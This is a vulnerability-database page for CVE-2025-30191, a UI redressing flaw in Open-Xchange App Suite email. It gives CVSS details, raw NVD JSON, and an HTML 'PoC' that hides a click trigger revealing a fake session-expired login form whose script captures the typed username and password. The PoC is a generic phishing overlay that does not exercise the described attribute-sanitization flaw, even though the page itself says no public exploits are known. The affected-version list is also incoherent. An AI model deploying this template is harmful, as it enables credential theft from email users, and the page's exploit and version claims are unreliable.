Security Vulnerability Report
CVE-2025-30191 CVSS 5.4 MEDIUM

CVE-2025-30191

Published: 2025-10-31 09:15:48
Last Modified: 2026-04-15 00:35:42

Description

Malicious content from E-Mail can be used to perform a redressing attack. Users can be tricked into performing unintended actions or providing sensitive information to a third party, which would enable further threats. Attribute values containing HTML fragments are now denied by the sanitization procedure. No publicly available exploits are known.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Open-Xchange App Suite < 7.10.x
Open-Xchange App Suite < 7.8.x
Open-Xchange App Suite < 7.6.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-30191 PoC: UI Redressing Attack via Malicious Email -->
<!-- This PoC demonstrates the UI redressing attack vector -->
<!-- In real attack, this would be embedded in email content -->
<!DOCTYPE html>
<html>
<head>
  <style>
    /* Malicious overlay styles */
    .overlay-container {
      position: relative;
    }
    .fake-login {
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background: rgba(255, 255, 255, 0.95);
      border: 2px solid #ccc;
      border-radius: 5px;
      padding: 20px;
      z-index: 9999;
      display: none;
    }
    .fake-login input {
      width: 100%;
      padding: 10px;
      margin: 10px 0;
      border: 1px solid #ccc;
      border-radius: 3px;
    }
    .fake-login button {
      width: 100%;
      padding: 10px;
      background: #0066cc;
      color: white;
      border: none;
      border-radius: 3px;
      cursor: pointer;
    }
    .trigger-element {
      opacity: 0.01;
      position: absolute;
      width: 100%;
      height: 100%;
      cursor: pointer;
    }
  </style>
</head>
<body>
  <div class="overlay-container">
    <!-- Legitimate looking email content -->
    <h1>Important Message</h1>
    <p>Please review your account settings.</p>

    <!-- Hidden fake login form -->
    <div class="fake-login" id="fakeLogin">
      <h3>Session Expired - Please Login Again</h3>
      <input type="text" placeholder="Username" id="username">
      <input type="password" placeholder="Password" id="password">
      <button onclick="stealCredentials()">Login</button>
    </div>

    <!-- Invisible trigger element -->
    <div class="trigger-element" onclick="showFakeLogin()"></div>
  </div>

  <script>
    function showFakeLogin() {
      document.getElementById('fakeLogin').style.display = 'block';
    }

    function stealCredentials() {
      var user = document.getElementById('username').value;
      var pass = document.getElementById('password').value;
      // In real attack, credentials would be exfiltrated
      console.log('Stolen credentials: ' + user + ':' + pass);
      alert('Credentials captured!');
    }
  </script>
</body>
</html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-30191", "sourceIdentifier": "[email protected]", "published": "2025-10-31T09:15:47.860", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Malicious content from E-Mail can be used to perform a redressing attack. Users can be tricked to perform unintended actions or provide sensitive information to a third party which would enable further threats. Attribute values containing HTML fragments are now denied by the sanitization procedure. No publicly available exploits are known"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1021"}]}], "references": [{"url": "https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2025/oxas-adv-2025-0002.json", "source": "[email protected]"}]}}